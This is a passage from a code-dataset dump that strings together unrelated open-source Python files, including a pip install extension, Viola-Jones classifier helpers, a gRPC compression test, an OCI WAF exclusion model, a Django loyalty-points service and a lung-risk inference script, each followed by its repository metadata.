should we?\n extras = [extra for extra in req.extras if extra in dist.extras]\n for sub_req in sorted(dist.requires(extras=extras), key=lambda req: req.key):\n sub_req = InstallRequirement(sub_req, req)\n\n if req_cycle(sub_req):\n logger.warning('Circular dependency! %s', sub_req)\n continue\n elif sub_req.req in queued:\n logger.debug('already queued: %s', sub_req)\n continue\n else:\n logger.debug('adding sub-requirement %s', sub_req)\n queue.append(sub_req)\n queued.add(sub_req.req)\n\n if errors:\n raise InstallationError('\\n'.join(errors))\n\n return result\n\n\ndef reqnames(reqs):\n return {req.name for req in reqs}\n\n\nclass FasterInstallCommand(InstallCommand):\n\n def __init__(self, *args, **kw):\n super(FasterInstallCommand, self).__init__(*args, **kw)\n\n cmd_opts = self.cmd_opts\n cmd_opts.add_option(\n '--prune',\n action='store_true',\n dest='prune',\n default=False,\n help='Uninstall any non-required packages.',\n )\n\n cmd_opts.add_option(\n '--no-prune',\n action='store_false',\n dest='prune',\n help='Do not uninstall any non-required packages.',\n )\n\n def run(self, options, args):\n \"\"\"update install options with caching values\"\"\"\n if options.prune:\n previously_installed = pip_get_installed()\n\n index_urls = [options.index_url] + options.extra_index_urls\n with pipfaster_download_cacher(index_urls):\n requirement_set = super(FasterInstallCommand, self).run(\n options, args,\n )\n\n required = requirement_set.requirements.values()\n\n # With extra_index_urls we don't know where the wheel is from\n if not options.extra_index_urls:\n cache_installed_wheels(options.index_url, requirement_set.successfully_downloaded)\n\n if not options.ignore_dependencies:\n # transitive requirements, previously installed, are also required\n # this has a side-effect of finding any missing / conflicting requirements\n required = trace_requirements(required)\n\n if not options.prune:\n return requirement_set\n\n extraneous = (\n reqnames(previously_installed) -\n reqnames(required) -\n # the stage1 bootstrap packages\n reqnames(trace_requirements([install_req_from_line('venv-update')])) -\n # See #186\n frozenset(('pkg-resources',))\n )\n\n if extraneous:\n extraneous = sorted(extraneous)\n pip(('uninstall', '--yes') + tuple(extraneous))\n\n # TODO: Cleanup: remove stale values from the cache and wheelhouse that have not been accessed in a week.\n\n# TODO: a pip_faster.patch module\n\n\ndef patch(attrs, updates):\n \"\"\"Perform a set of updates to a attribute dictionary, return the original values.\"\"\"\n orig = {}\n for attr, value in updates:\n orig[attr] = attrs[attr]\n attrs[attr] = value\n return orig\n\n\n@contextmanager\ndef patched(attrs, updates):\n \"\"\"A context in which some attributes temporarily have a modified value.\"\"\"\n orig = patch(attrs, updates.items())\n try:\n yield orig\n finally:\n patch(attrs, orig.items())\n# END: pip_faster.patch module\n\n\ndef pipfaster_install_prune_option():\n return patched(pipmodule._internal.commands.commands_dict, {FasterInstallCommand.name: FasterInstallCommand})\n\n\ndef pipfaster_packagefinder():\n \"\"\"Provide a short-circuited search when the requirement is pinned and appears on disk.\n\n Suggested upstream at: https://github.com/pypa/pip/pull/2114\n \"\"\"\n # A poor man's dependency injection: monkeypatch :(\n try: # :pragma:nocover: pip>=18.1\n from pip._internal.cli import base_command\n except ImportError: # :pragma:nocover: pip<18.1\n from pip._internal import basecommand as base_command\n return 
patched(vars(base_command), {'PackageFinder': FasterPackageFinder})\n\n\ndef pipfaster_download_cacher(index_urls):\n \"\"\"vanilla pip stores a cache of the http session in its cache and not the\n wheel files. We intercept the download and save those files into our\n cache\n \"\"\"\n from pip._internal import download\n orig = download._download_http_url\n patched_fn = get_patched_download_http_url(orig, index_urls)\n return patched(vars(download), {'_download_http_url': patched_fn})\n\n\ndef main():\n with pipfaster_install_prune_option():\n with pipfaster_packagefinder():\n raise_on_failure(pipmodule._internal.main)\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"Yelp/venv-update","sub_path":"pip_faster.py","file_name":"pip_faster.py","file_ext":"py","file_size_in_byte":16309,"program_lang":"python","lang":"en","doc_type":"code","stars":177,"dataset":"github-code","pt":"52"} +{"seq_id":"74444151845","text":"\nimport numpy as np\n\n\ndef train_weak_classifiers(data,labels):\n \"\"\"\n Trains weak classifiers. \n ---------\n Arguments\n ---------\n data [np.array]: Numpy array of shape (m,162336)\n labels [np.array]: Numpy array of shape (m,) with ones for faces and zeros for non-faces\n -------\n Returns\n -------\n theta_vector [np.array]: Numpy array of shape (162336,) denoting thresholds\n parity_vector [np.array]: Numpy array of shape (162336,) with (1,-1) denoting sign of inequality\n \"\"\"\n num_samples, num_features = data.shape\n theta_vector = np.zeros((num_features,))\n parity_vector = np.zeros((num_features,))\n for feat_id in range(num_features):\n features = data[:,feat_id]\n indices = features.argsort()\n labels_sorted = labels[indices]\n num_corrects = np.zeros((2,num_samples))\n for t in range(num_samples):\n num_corrects[0,t] = t-labels_sorted[:t].sum()+labels_sorted[t:].sum()\n num_corrects[1,t] = num_samples - num_corrects[0,t]\n idx = num_corrects.argmax()\n parity = idx//num_samples\n theta = features[indices][idx%num_samples]\n theta_vector[feat_id] = theta\n parity_vector[feat_id] = parity\n # if feat_id==50:\n # break\n parity_vector = 1-parity_vector\n parity_vector[parity_vector==0] = -1\n return theta_vector, parity_vector\n\ndef predict(feature_vec,theta,parity):\n \"\"\"\n Returns predictions for m samples with a specific feature.\n ---------\n Arguments\n ---------\n feature_vec [np.array]: Numpy array of shape (m,) denoting a particular feature of m samples\n theta [float]: Threshold\n parity [parity]: Sign of inequality\n -------\n Returns\n -------\n pred [np.array]: Numpy array of shape (m,) denoting predictions of m samples in (1,-1) notation\n \"\"\"\n return parity*np.sign(feature_vec-theta)\n\ndef predict_full_data(data,theta_vec,parity_vec, majority_label=0):\n \"\"\"\n Returns predictions for m samples with multiple features. Each sample x feature combination has a prediction\n ---------\n Arguments\n ---------\n data [np.array]: Numpy array of shape (m,162336)\n theta_vec [np.array]: Numpy array of shape (162336,) denoting thresholds\n parity_vec [np.array]: Numpy array of shape (162336,) with (1,-1) denoting sign of inequality\n majority_label [int]: Majority label. 
In case feature==threshold, majority label is assigned\n -------\n Returns\n -------\n preds [np.array]: Numpy array of shape (m,162336) denoting predictions in (1,0) notation\n \"\"\"\n num_samples, num_features = data.shape\n preds = np.zeros((num_samples,num_features))\n for feat_id in range(num_features):\n feature_vec = data[:,feat_id]\n preds[:,feat_id] = predict(feature_vec,theta_vec[feat_id],parity_vec[feat_id])\n # if feat_id==50:\n # break\n preds[preds==0] = majority_label\n preds[preds==-1] = 0\n preds = preds.astype(int)\n return preds\n\ndef accumulate_accs(labels,preds):\n \"\"\"\n Measure performance of weak classifiers\n ---------\n Arguments\n ---------\n labels [np.array]: Numpy array of shape (m,) with ones for faces and zeros for non-faces\n preds [np.array]: Numpy array of shape (m,162336) denoting predictions in (1,0) notation\n -------\n Returns\n -------\n accs [np.array]: Numpy array of shape (162336,) denoting accuracies of all features\n \"\"\"\n num_samples, num_features = preds.shape\n accs = np.zeros((num_features,))\n for feat_id in range(num_features):\n preds_vec = preds[:,feat_id]\n assert labels.shape == preds_vec.shape\n acc = (labels==preds_vec).sum()/num_samples\n accs[feat_id] = acc\n return accs\n\n\ndef print_accs(labels,preds):\n \"\"\"\n Prints performance of weak classifiers\n ---------\n Arguments\n ---------\n labels [np.array]: Numpy array of shape (m,) with ones for faces and zeros for non-faces\n preds [np.array]: Numpy array of shape (m,162336) denoting predictions in (1,0) notation\n -------\n Returns\n -------\n None\n \"\"\"\n labels[labels==0] = -1\n num_samples, num_features = preds.shape\n for feat_id in range(num_features):\n preds_vec = preds[:,feat_id]\n assert labels.shape == preds_vec.shape\n acc = (labels==preds_vec).sum()/num_samples\n print(feat_id, acc)\n # if feat_id==50:\n # break\n\n","repo_name":"piyush01123/viola-jones-face","sub_path":"src/classifier_utils.py","file_name":"classifier_utils.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12597497335","text":"import unittest\n\nimport logging\nimport grpc\nfrom grpc import _grpcio_metadata\n\nfrom tests.unit import test_common\nfrom tests.unit.framework.common import test_constants\n\n_UNARY_UNARY = '/test/UnaryUnary'\n_STREAM_STREAM = '/test/StreamStream'\n\n\ndef handle_unary(request, servicer_context):\n servicer_context.send_initial_metadata([('grpc-internal-encoding-request',\n 'gzip')])\n return request\n\n\ndef handle_stream(request_iterator, servicer_context):\n # TODO(issue:#6891) We should be able to remove this loop,\n # and replace with return; yield\n servicer_context.send_initial_metadata([('grpc-internal-encoding-request',\n 'gzip')])\n for request in request_iterator:\n yield request\n\n\nclass _MethodHandler(grpc.RpcMethodHandler):\n\n def __init__(self, request_streaming, response_streaming):\n self.request_streaming = request_streaming\n self.response_streaming = response_streaming\n self.request_deserializer = None\n self.response_serializer = None\n self.unary_unary = None\n self.unary_stream = None\n self.stream_unary = None\n self.stream_stream = None\n if self.request_streaming and self.response_streaming:\n self.stream_stream = handle_stream\n elif not self.request_streaming and not self.response_streaming:\n self.unary_unary = handle_unary\n\n\nclass _GenericHandler(grpc.GenericRpcHandler):\n\n def service(self, handler_call_details):\n if 
handler_call_details.method == _UNARY_UNARY:\n return _MethodHandler(False, False)\n elif handler_call_details.method == _STREAM_STREAM:\n return _MethodHandler(True, True)\n else:\n return None\n\n\nclass CompressionTest(unittest.TestCase):\n\n def setUp(self):\n self._server = test_common.test_server()\n self._server.add_generic_rpc_handlers((_GenericHandler(),))\n self._port = self._server.add_insecure_port('[::]:0')\n self._server.start()\n\n def tearDown(self):\n self._server.stop(None)\n\n def testUnary(self):\n request = b'\\x00' * 100\n\n # Client -> server compressed through default client channel compression\n # settings. Server -> client compressed via server-side metadata setting.\n # TODO(https://github.com/grpc/grpc/issues/4078): replace the \"1\" integer\n # literal with proper use of the public API.\n compressed_channel = grpc.insecure_channel(\n 'localhost:%d' % self._port,\n options=[('grpc.default_compression_algorithm', 1)])\n multi_callable = compressed_channel.unary_unary(_UNARY_UNARY)\n response = multi_callable(request)\n self.assertEqual(request, response)\n\n # Client -> server compressed through client metadata setting. Server ->\n # client compressed via server-side metadata setting.\n # TODO(https://github.com/grpc/grpc/issues/4078): replace the \"0\" integer\n # literal with proper use of the public API.\n uncompressed_channel = grpc.insecure_channel(\n 'localhost:%d' % self._port,\n options=[('grpc.default_compression_algorithm', 0)])\n multi_callable = uncompressed_channel.unary_unary(_UNARY_UNARY)\n response = multi_callable(\n request, metadata=[('grpc-internal-encoding-request', 'gzip')])\n self.assertEqual(request, response)\n compressed_channel.close()\n uncompressed_channel.close()\n\n def testStreaming(self):\n request = b'\\x00' * 100\n\n # TODO(https://github.com/grpc/grpc/issues/4078): replace the \"1\" integer\n # literal with proper use of the public API.\n compressed_channel = grpc.insecure_channel(\n 'localhost:%d' % self._port,\n options=[('grpc.default_compression_algorithm', 1)])\n multi_callable = compressed_channel.stream_stream(_STREAM_STREAM)\n call = multi_callable(iter([request] * test_constants.STREAM_LENGTH))\n for response in call:\n self.assertEqual(request, response)\n compressed_channel.close()\n\n\nif __name__ == '__main__':\n logging.basicConfig()\n unittest.main(verbosity=2)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/grpc/src/src/python/grpcio_tests/tests/unit/_compression_test.py","file_name":"_compression_test.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"31606070119","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass ProtectionRuleExclusion(object):\n \"\"\"\n Allows specified types of requests to bypass the protection rule. If a request matches any of the criteria in the `exclusions` field, the protection rule will not be executed. Rules can have more than one exclusion and exclusions are applied to requests disjunctively, meaning the specified exclusion strings are independently matched against the specified targets of a request. The first target to match a specified string will trigger an exclusion. 
**Example:** If the following exclusions are defined for a protection rule:\n\n \\\"action\\\": \\\"BLOCK\\\",\n \\\"exclusions\\\": [\n {\n \\\"target\\\":\\\"REQUEST_COOKIES\\\",\n \\\"exclusions\\\":[\\\"example.com\\\", \\\"12345\\\", \\\"219ffwef9w0f\\\"]\n },\n {\n \\\"target\\\":\\\"REQUEST_COOKIE_NAMES\\\",\n \\\"exclusions\\\":[\\\"OAMAuthnCookie\\\", \\\"JSESSIONID\\\", \\\"HCM-PSJSESSIONID\\\"]\n }\n ],\n \\\"key\\\": \\\"1000000\\\",\n\n A request with the cookie name `sessionid` would trigger an exclusion. A request with the cookie name `yourcompany.com` would *not* trigger an exclusion.\n \"\"\"\n\n #: A constant which can be used with the target property of a ProtectionRuleExclusion.\n #: This constant has a value of \"REQUEST_COOKIES\"\n TARGET_REQUEST_COOKIES = \"REQUEST_COOKIES\"\n\n #: A constant which can be used with the target property of a ProtectionRuleExclusion.\n #: This constant has a value of \"REQUEST_COOKIE_NAMES\"\n TARGET_REQUEST_COOKIE_NAMES = \"REQUEST_COOKIE_NAMES\"\n\n #: A constant which can be used with the target property of a ProtectionRuleExclusion.\n #: This constant has a value of \"ARGS\"\n TARGET_ARGS = \"ARGS\"\n\n #: A constant which can be used with the target property of a ProtectionRuleExclusion.\n #: This constant has a value of \"ARGS_NAMES\"\n TARGET_ARGS_NAMES = \"ARGS_NAMES\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new ProtectionRuleExclusion object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param target:\n The value to assign to the target property of this ProtectionRuleExclusion.\n Allowed values for this property are: \"REQUEST_COOKIES\", \"REQUEST_COOKIE_NAMES\", \"ARGS\", \"ARGS_NAMES\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type target: str\n\n :param exclusions:\n The value to assign to the exclusions property of this ProtectionRuleExclusion.\n :type exclusions: list[str]\n\n \"\"\"\n self.swagger_types = {\n 'target': 'str',\n 'exclusions': 'list[str]'\n }\n\n self.attribute_map = {\n 'target': 'target',\n 'exclusions': 'exclusions'\n }\n\n self._target = None\n self._exclusions = None\n\n @property\n def target(self):\n \"\"\"\n Gets the target of this ProtectionRuleExclusion.\n The target of the exclusion.\n\n Allowed values for this property are: \"REQUEST_COOKIES\", \"REQUEST_COOKIE_NAMES\", \"ARGS\", \"ARGS_NAMES\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The target of this ProtectionRuleExclusion.\n :rtype: str\n \"\"\"\n return self._target\n\n @target.setter\n def target(self, target):\n \"\"\"\n Sets the target of this ProtectionRuleExclusion.\n The target of the exclusion.\n\n\n :param target: The target of this ProtectionRuleExclusion.\n :type: str\n \"\"\"\n allowed_values = [\"REQUEST_COOKIES\", \"REQUEST_COOKIE_NAMES\", \"ARGS\", \"ARGS_NAMES\"]\n if not value_allowed_none_or_none_sentinel(target, allowed_values):\n target = 'UNKNOWN_ENUM_VALUE'\n self._target = target\n\n @property\n def exclusions(self):\n \"\"\"\n Gets the exclusions of this ProtectionRuleExclusion.\n\n :return: The exclusions of this ProtectionRuleExclusion.\n :rtype: list[str]\n \"\"\"\n return self._exclusions\n\n @exclusions.setter\n def exclusions(self, exclusions):\n \"\"\"\n Sets the exclusions of this ProtectionRuleExclusion.\n\n :param exclusions: The 
exclusions of this ProtectionRuleExclusion.\n :type: list[str]\n \"\"\"\n self._exclusions = exclusions\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/waas/models/protection_rule_exclusion.py","file_name":"protection_rule_exclusion.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"44073886644","text":"from turtle import Turtle\n\n\nFONT = (\"Courier\", 24, \"normal\")\n\n\nclass Scoreboard(Turtle):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.color(\"black\")\n\t\tself.penup()\n\t\tself.hideturtle()\n\t\tself.goto(-280, 250)\n\t\tself.level = 1\n\t\tself.update_scoreboard()\n\n\n\tdef increase_level(self):\n\t\tself.level += 1\n\t\tself.update_scoreboard()\n\n\n\tdef update_scoreboard(self):\n\t\tself.clear()\n\t\ttext = f\"Level: {self.level}\"\n\t\tself.write(arg=text, align=\"left\", font=FONT)\n\n\n\tdef game_over(self):\n\t\ttext = \"GAME OVER\"\n\t\tself.goto(0, 0)\n\t\tself.write(arg=text, align=\"center\", font=FONT)","repo_name":"tiagoserique/100-days-of-code-in-python","sub_path":"023-day/turtle_crossing/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30097900281","text":"from api.models import *\nfrom datetime import datetime, date, time, timedelta\nfrom django.conf import settings\nfrom django.utils.timezone import make_aware\nfrom random import random\nfrom hashlib import sha1\nimport struct\n\ndef login(email, password):\n try:\n u = Client.objects.get(email=email, password=password)\n return u\n except Client.DoesNotExist:\n pass\n try:\n u = Store.objects.get(email=email, password=password)\n return u\n except Store.DoesNotExist:\n return None\n\ndef getStore(store_id):\n try:\n s = Store.objects.get(id=store_id)\n except Store.DoesNotExist:\n return None\n\n return s.getJson()\n\ndef getAllStores():\n return {'stores':[store.getJson() for store in Store.objects.all()]}\n\ndef getAllCategories():\n return {'categories':[category.getJson() for category in Category.objects.all()]}\n\ndef getFidelityPoints(client_id,store_id):\n try:\n return FidelityPoints.objects.get(client=client_id,store=store_id).points\n except FidelityPoints.DoesNotExist:\n return 0\n\ndef getAllFidelityPoints(client_id):\n return {'points':[{'store':x.store.getJson(),'points':x.points} for x in list(FidelityPoints.objects.filter(client=client_id))]}\n\n\ndef getStoreProducts(store_id):\n try:\n s = Store.objects.get(id=store_id)\n except Store.DoesNotExist:\n return None\n\n return [product.getJson() for product in Product.objects.filter(store=s)]\n\n\ndef addProduct(pName,pDescription,pCategory,store_id,pPoints,pQuantity):\n try:\n store = Store.objects.get(id=store_id)\n c = Category.objects.get(name=pCategory)\n p = Product.objects.create(name=pName,description=pDescription,category=c,store=store,points=pPoints,quantity=pQuantity)\n p.save()\n except:\n return None\n\n return p\n\n\ndef updateProduct(product_id,pName,pDescription,pCategory,store_id,pPoints,pQuantity):\n try:\n p = Product.objects.get(id=product_id)\n except Product.DoesNotExist:\n return None\n\n if(p.store.id == store_id):\n p.name = pName\n 
p.description = pDescription\n try:\n c = Category.objects.get(name=pCategory)\n except Category.DoesNotExist:\n return None\n p.category = c\n p.points = pPoints\n p.quantity = pQuantity\n\n p.save()\n else:\n return None\n\n return p\n\n\ndef removeProduct(product_id,store_id):\n try:\n p = Product.objects.get(id=product_id)\n except Product.DoesNotExist:\n return None\n\n if(p.store.id == store_id):\n return p.delete()\n else:\n return None\n\n\ndef creditClient(store_id,client_hash):\n try:\n s = Store.objects.get(id=store_id)\n except Store.DoesNotExist:\n return 'storeNotFound'\n\n settings.TIME_ZONE\n creditTime = make_aware(datetime.now())\n\n clientList = Client.objects.filter(hash=client_hash, generatedOn__gte=(creditTime-timedelta(minutes=10)))\n if not clientList:\n print(\"no client found or qr code expired\")\n return 'qrcode'\n else:\n c = clientList[0]\n print(c)\n\n fp, created = FidelityPoints.objects.get_or_create(store=s,client=c)\n\n today_min = make_aware(datetime.combine(date.today(), time.min))\n print(today_min)\n today_max = make_aware(datetime.combine(date.today(), time.max))\n print(today_max)\n\n print(fp.lastTimeCredited)\n if((fp.lastTimeCredited is not None) and (fp.lastTimeCredited>=today_min and fp.lastTimeCredited<=today_max)):\n print(\"already credited today\")\n return 'fraud'\n else:\n fp.points += s.givenPoints\n fp.lastTimeCredited = make_aware(datetime.now())\n fp.save()\n c.hash = None\n c.save()\n return 'success'\n\n\ndef debitClient(store_id,transaction):\n try:\n s = Store.objects.get(id=store_id)\n print(s)\n except Store.DoesNotExist:\n print(\"no store found\")\n return None\n\n client_hash = transaction['client_hash']\n\n settings.TIME_ZONE\n debitTime = make_aware(datetime.now())\n\n clientList = Client.objects.filter(hash=client_hash, generatedOn__gte=(debitTime-timedelta(minutes=10)))\n if not clientList:\n print(\"no client found or qr code expired\")\n return None\n else:\n c = clientList[0]\n print(c)\n\n products = transaction['products']\n\n\n transactionPoints = 0\n for p in products:\n pId = p['id']\n pQuantity = p['quantity']\n\n product = Product.objects.get(id=pId)\n\n transactionPoints += (product.points * pQuantity)\n\n print(transactionPoints)\n\n try:\n fp = FidelityPoints.objects.get(store=s,client=c)\n print(fp)\n except:\n print(\"fp not found\")\n return None\n\n if(transactionPoints <= fp.points):\n #validatedOn = datetime.now()\n settings.TIME_ZONE\n validatedOn = make_aware(datetime.now())\n\n try:\n t = Transaction.objects.create(client=c, store=s, validatedOn=validatedOn)\n except:\n print(\"couldn't create transaction\")\n return None\n\n try:\n for p in products:\n pId = p['id']\n pQuantity = p['quantity']\n\n product = Product.objects.get(id=pId)\n print(product)\n \n tp = TransactionProduct.objects.create(transaction=t, name=product.name, description=product.description, category=product.category.name, points=product.points, quantity=pQuantity)\n print(tp)\n \n product.quantity -= pQuantity\n if(product.quantity < 0):\n print('not enough products')\n return None\n\n tp.save()\n product.save()\n\n except:\n print(\"couldn't create transactionProducts\")\n t.delete()\n return None\n\n fp.points -= transactionPoints\n c.hash = None\n\n fp.save()\n c.save()\n t.save()\n\n else:\n print(\"not enough points\")\n return None\n\n return t\n\n\ndef generateQRCode(client_id):\n try:\n client = Client.objects.get(id=client_id)\n except Client.DoesNotExist:\n return None\n\n return client.generateQRCode()\n\ndef 
getPointsForClient(store_id,hash):\n\n try:\n client = Client.objects.get(hash=hash)\n except Client.DoesNotExist:\n return None\n try:\n return FidelityPoints.objects.get(client=client.id,store=store_id).points\n except FidelityPoints.DoesNotExist:\n return 0\n\ndef getAllProductModels():\n return {'modelProducts':[prod.getJson() for prod in ProductModel.objects.all()]}\n\ndef getPurchaseRecords(client_id):\n #return {'Records': [{'store':x.store.getJson(),'validatedOn':x.validatedOn,'products':[{'product':y.getJson(),'quantity':TransactionProduct.objects.get(transaction=x.id,product=y.id).quantity} for y in x.products.all()]} for x in Transaction.objects.filter(client=client_id)]}\n '''\n tList = Transaction.objects.filter(client=client_id)\n for t in tList:\n tpList = TransactionProduct.objects.filter(transaction=t)\n '''\n\n return {'Records': [{'store':t.store.getJson(),'validatedOn':t.validatedOn,'products':[{'product':tp.getJson()} for tp in TransactionProduct.objects.filter(transaction=t)]} for t in Transaction.objects.filter(client=client_id)]}\n\n\ndef updateClientInfo(client_id,firstname,lastname,password, email):\n client = Client.objects.get(id=client_id)\n client.email=email\n client.lastname=lastname\n client.firstname=firstname\n client.password=password\n client.save()\n return client\n\ndef updateStoreInfo(store_id,givenPoints,saleStart,saleEnd):\n store = Store.objects.get(id=store_id)\n store.givenPoints=givenPoints\n store.saleStart=saleStart\n store.saleEnd=saleEnd\n store.save()\n return store\n","repo_name":"lorettet/Smart","sub_path":"api/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":7930,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34520400155","text":"from vector import Vector\nimport math\n\nv1_x = (-3, 0, 5, 9)\nv1_y = (-5, 0, 7, 9)\n\nv2_x = (-15, 0, 34, 9)\nv2_y = (-6, 0, 2, 9)\n\nv1_list = list()\nv2_list = list()\n\nfor x1 in v1_x:\n for y1 in v1_y:\n v1_list.append(Vector(x1, y1))\n\nfor x2 in v2_x:\n for y2 in v2_y:\n v2_list.append(Vector(x2, y2))\n\n\ndef compare(v, v_before):\n x_eq = v.x() == v_before.x()\n y_eq = v.y() == v_before.y()\n return x_eq and y_eq\n\n\ndef test_add():\n for v1 in v1_list:\n for v2 in v2_list:\n v1_before = Vector(v1.x(), v1.y())\n v2_before = Vector(v2.x(), v2.y())\n v3 = v1 + v2\n assert v3.x() == v1.x() + v2.x()\n assert v3.y() == v1.y() + v2.y()\n assert compare(v1, v1_before) is True\n assert compare(v2, v2_before) is True\n\n\ndef test_eq():\n for v1 in v1_list:\n for v2 in v2_list:\n x_eq = v1.x() == v2.x()\n y_eq = v1.y() == v2.y()\n v_eq = v1 == v2\n assert v_eq == (x_eq and y_eq)\n\n\ndef test_neq():\n for v1 in v1_list:\n for v2 in v2_list:\n x_neq = v1.x() != v2.x()\n y_neq = v1.y() != v2.y()\n v_neq = v1 != v2\n assert v_neq == (x_neq or y_neq)\n\n\ndef test_mul_num():\n for v in v1_list:\n for num in v2_x:\n x_mul_num = v.x() * num\n y_mul_num = v.y() * num\n assert x_mul_num == (v * num).x()\n assert y_mul_num == (v * num).y()\n\n\ndef test_mul_vec():\n for v1 in v1_list:\n for v2 in v2_list:\n res_vec = Vector(v1.x() * v2.x(), v1.y() * v2.y())\n assert (v1 * v2).x() == res_vec.x()\n assert (v1 * v2).y() == res_vec.y()\n assert v1 * v2.x() == Vector(v1.x() * v2.x(), v1.y() * v2.x())\n assert v2.x() * v1 == Vector(v1.x() * v2.x(), v1.y() * v2.x())\n\n\ndef test_length():\n for v in v1_list:\n length = v.x() ** 2 + v.y() ** 2\n length = length ** 0.5\n assert math.isclose(v.length(), 
length)\n","repo_name":"patrikeevairina/hll_labs","sub_path":"lab_2/test_vector.py","file_name":"test_vector.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39410252571","text":"\"\"\"\n ----------------------------------------\n CXR-Lung-Risk - data processing\n ----------------------------------------\n\"\"\"\n\nimport sys\nimport argparse\nimport subprocess\n\nimport warnings\nwarnings.simplefilter(action = 'ignore')\n\nimport math\nimport time\nimport pretrainedmodels\n\nimport pandas as pd\n\nfrom docopt import docopt\nfrom sklearn.metrics import *\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport SimpleArchs\n\nimport fastai\nfrom fastai.vision.all import *\n\n\ndef run_cxr_lung_risk(config):\n\n \"\"\"\n Run the CXR-Lung-Risk processing pipeline. Before running this script, the user must ensure that the model weights are\n downloaded and found in the right folder (\"/path/to/repo/models\" for the ensemble, and ~/.cache/torch/hub/checkpoints\n for the InceptionV4 checkpoint - see README.md for additional instructions).\n\n Furthermore, the user must ensure any piece of data to be processed was correctly preprocessed (and converted to .png).\n\n Arguments:\n config : required - dictionary storing the arguments parsed from the configuration file \"config.yaml\".\n \n Outputs:\n This function runs the CXR-Lung-Risk pipeline, and outputs the results in a CSV file stored at the specified location (config.yaml).\n \"\"\"\n \n ensemble_weights_fn = config[\"ensemble_weights_fn\"]\n model_details_fn = config[\"model_details_fn\"]\n mdl_dir = config[\"mdl_dir\"]\n mdl_name = config[\"mdl_name\"]\n\n use_gpu = config[\"use_gpu\"]\n gpu_id = config[\"gpu_id\"]\n\n test_set_dir = config[\"test_set_dir\"]\n test_dataset_name = config[\"test_dataset_name\"]\n\n out_file_path = config[\"out_file_path\"]\n\n if use_gpu:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = gpu_id\n else:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n\n model_details_df = pd.read_csv(model_details_fn)\n ensemble_weights_df = pd.read_csv(ensemble_weights_fn)\n\n patients_list = [f for f in os.listdir(test_set_dir) if os.path.isfile(os.path.join(test_set_dir, f))] \n\n # The results of the inference phase are stored in the DataFrame \"results_df\"\n\n # Dummy is a dummy nonsense variable to act as the fake \"target variable\" - necessary for the pipeline to run\n # The column \"valid_col\" is True for all samples except for an artificial sample at the end\n # (since for the fast.ai learner to work, there needs to be a \"training set\" included too)\n output_df = pd.DataFrame(columns = ['File', 'Dummy', 'Prediction'])\n output_df['File'] = patients_list\n output_df['Dummy'] = np.random.random_sample(len(patients_list))\n output_df['valid_col'] = np.repeat(True, output_df.shape[0])\n\n # Add an additional image to act as the dummy training set, by setting the \"valid_col\" value to False\n results_df = output_df.append(output_df.iloc[output_df.shape[0] -1, :],\n ignore_index = True)\n\n results_df.loc[results_df.shape[0] -1, 'valid_col'] = False \n\n # The number of models in the ensemble corresponds to the number of rows in the \"model_details_df\" dataframe\n # In this specific case, the number of models should be 20\n model_number = model_details_df.shape[0]\n mbar = master_bar(range(model_number))\n\n print()\n\n # Create an empty array of num_images x 20 (20-models-ensemble)\n pred_arr = 
np.zeros((results_df.shape[0]-1, model_number))\n\n # run the inference loop for every model in the ensemble\n for model_id in mbar:\n out_nodes = int(model_details_df.Num_Classes[model_id])\n manual = False\n size = int(model_details_df.Image_Size[model_id])\n bs,val_bs = 4,4\n if(int(model_details_df.Normalize[model_id])==0):\n imgs = ImageDataLoaders.from_df(df = results_df, path = test_set_dir,\n label_col = \"Dummy\", y_block = RegressionBlock, bs = bs,\n val_bs = val_bs, valid_col = \"valid_col\",\n item_tfms = Resize(size), batch_tfms = None)\n else:\n imgs = ImageDataLoaders.from_df(df = results_df, path = test_set_dir,\n label_col = \"Dummy\", y_block = RegressionBlock, bs = bs,\n val_bs = val_bs, valid_col = \"valid_col\",\n item_tfms = Resize(size),\n batch_tfms = [Normalize.from_stats(*imagenet_stats)])\n\n # parse the model architecture from the \"model_details_fn\" file;\n # based on the model hyperparameters and details (stored in \"model_hyperparams_df\"),\n # initialise automatically a cnn learner object\n try:\n model_arch = model_details_df.Architecture[model_id].lower()\n \n # Cadene's pretrainedmodels InceptionV4 loading\n if(model_arch == \"inceptionv4\"):\n def get_model(pretrained = True, model_name = 'inceptionv4', **kwargs ): \n if pretrained:\n arch = pretrainedmodels.__dict__[model_name](num_classes = 1000, pretrained = 'imagenet')\n else:\n arch = pretrainedmodels.__dict__[model_name](num_classes = 1000, pretrained = None)\n return arch\n\n def get_cadene_model(pretrained=True, 